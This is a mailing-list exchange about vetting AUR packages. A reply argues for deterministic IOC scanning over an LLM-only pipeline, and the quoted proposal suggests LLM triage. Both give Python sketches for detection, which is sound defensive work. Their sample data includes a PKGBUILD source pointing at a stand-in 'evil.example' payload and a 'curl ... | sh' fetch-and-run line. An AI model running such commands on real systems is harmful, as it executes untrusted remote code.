Re: [Idea] AUR vetting process using LLM models

aur Fri, 29 May 2026 01:54:53 -0700

Hi,

I'm opposed to this idea, not because it's AI, but because it's misapplied and likely to be very costly while producing non-deterministic results.

What you are proposing would require the AUR to start checking every single commit through a DevSecOps-style CI/CD (SSDLC) pipeline, but with only one tool in it: a homebrewed AI solution.

It would be better to set up proper security tooling, or even integrate third-party malware detection services.

Reinventing SAST and DAST scanners here via self-hosted or costly third-party LLM providers seems like a very wrong approach.

A solution here should focus on three things: clustering and detection of compromised or malicious accounts for rapid takedowns or a moderation hold; prevention of malware being included, by blacklisting known IOCs in packages; and proper automated scanning of existing packages for malicious activity.
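
To make the IOC part concrete, here is a rough sketch of what a deterministic blocklist check on a PKGBUILD could look like. Everything in it is an assumption for illustration: the `BLOCKED_DOMAINS` and `BLOCKED_SHA256` sets, the `scan_pkgbuild` name, and the example domains are made up, and a real deployment would load its indicators from a maintained feed instead of hardcoding them.

```python
import re
from dataclasses import dataclass

# Hypothetical indicators, hardcoded only for this sketch.
BLOCKED_DOMAINS = {"evil.example", "malware.example"}
BLOCKED_SHA256 = {"0" * 64}

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
SHA256_HEX = re.compile(r"\b[0-9a-fA-F]{64}\b")


@dataclass(frozen=True)
class Hit:
    kind: str   # "domain" or "sha256"
    value: str  # the matched indicator as found in the text


def scan_pkgbuild(text: str) -> list[Hit]:
    """Return every blocklisted domain or checksum referenced in the text."""
    hits = []
    for host in URL_HOST.findall(text):
        host = host.lower().rstrip(".")
        # Match the blocked domain itself or any of its subdomains.
        if any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS):
            hits.append(Hit("domain", host))
    for digest in SHA256_HEX.findall(text):
        if digest.lower() in BLOCKED_SHA256:
            hits.append(Hit("sha256", digest.lower()))
    return hits


if __name__ == "__main__":
    sample = 'source=("https://cdn.evil.example/payload.sh")'
    for hit in scan_pkgbuild(sample):
        print(hit.kind, hit.value)
```

A check like this is cheap, gives the same answer every time, and can run on every push without any inference cost, which is the contrast with the LLM-only pipeline I'm drawing above.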

AI and LLMs have a role in supporting those three tasks as portions of the tools, not as the solution itself.

You are welcome to scan the AUR yourself today and post "bot comments" on the maliciousness of packages, but I think any Arch-hosted or Arch-developed solution should stay away from spinning up such expensive infrastructure to reinvent the wheel.


Regards,

Shyamin Ayesh:

Hello Everyone,

I know this is going to be a controversial idea, and I'm not much of a
writer, so bear with me here.

I've been noticing the recent wave of spam packages and malicious code
submissions hitting the AUR lately. It's getting worse, and the current
manual review process clearly doesn't scale.

So here's my possibly unpopular suggestion: *what if we used LLMs as a
first-pass filter for AUR submissions?*

*The basic idea:*
   - When a PKGBUILD or install script gets submitted, an LLM scans it for
sketchy stuff like obfuscated code, curl pipes to random endpoints, crypto
miners, encoded payloads, that kind of thing.
   - It doesn't replace human review. It just flags the suspicious ones so
reviewers know where to look first.
   - Unlike regex-based scanners, LLMs can actually understand code intent.
They can catch things like subtle dependency hijacking or weird
post-install behavior that static tools would miss.
   - Flagged packages go into a queue with the LLM's reasoning attached, not
just "blocked" but why it thinks something is off.
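
The flag-and-queue flow described in the list above could be sketched roughly as follows. This is only an illustration under assumptions: `triage`, `Flag`, and `toy_classifier` are hypothetical names, and `toy_classifier` is a trivial string-matching stand-in so the example runs on its own. It is not an LLM and makes no model calls; a prototype would plug a real classifier into the same `classify` parameter.

```python
from dataclasses import dataclass
from typing import Callable

# A classifier takes the submitted text and returns (score in [0, 1], reasoning).
Classifier = Callable[[str], tuple[float, str]]


@dataclass(frozen=True)
class Flag:
    package: str
    score: float
    reasoning: str  # shown to the human reviewer alongside the package


def toy_classifier(text: str) -> tuple[float, str]:
    """Stand-in scorer for the sketch; not a real model."""
    if "| sh" in text or "| bash" in text:
        return 0.9, "pipes a download into a shell"
    if "base64 -d" in text:
        return 0.6, "decodes an embedded payload"
    return 0.1, "nothing unusual"


def triage(submissions: dict[str, str], classify: Classifier,
           threshold: float = 0.5) -> list[Flag]:
    """Flag submissions at or above the threshold, most suspicious first.

    Nothing is blocked here: the result is only an ordered review queue.
    """
    flags = []
    for name, pkgbuild in submissions.items():
        score, why = classify(pkgbuild)
        if score >= threshold:
            flags.append(Flag(name, score, why))
    return sorted(flags, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    queue = triage(
        {
            "pkg-a": "curl https://x.example/install.sh | sh",
            "pkg-b": "make install",
        },
        toy_classifier,
    )
    for flag in queue:
        print(flag.package, flag.score, flag.reasoning)
```

Keeping the classifier behind a plain function signature means the queue logic stays the same whether the scorer is a model, a rule set, or both.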

I get it, there are real concerns. False positives, inference costs, and
honestly just the idea of putting AI anywhere near the trust pipeline. But
I'm not saying replace anything. Just add a layer. Could be a server-side
hook on submission, or a community bot that comments on new packages. I'm
happy to help build a prototype if anyone's interested.

I know some of you are going to hate this idea, and that's fine. But the
spam problem is real and getting worse, so I figured it's worth putting out
there. Open to better ideas too.

Cheers,
Shyamin

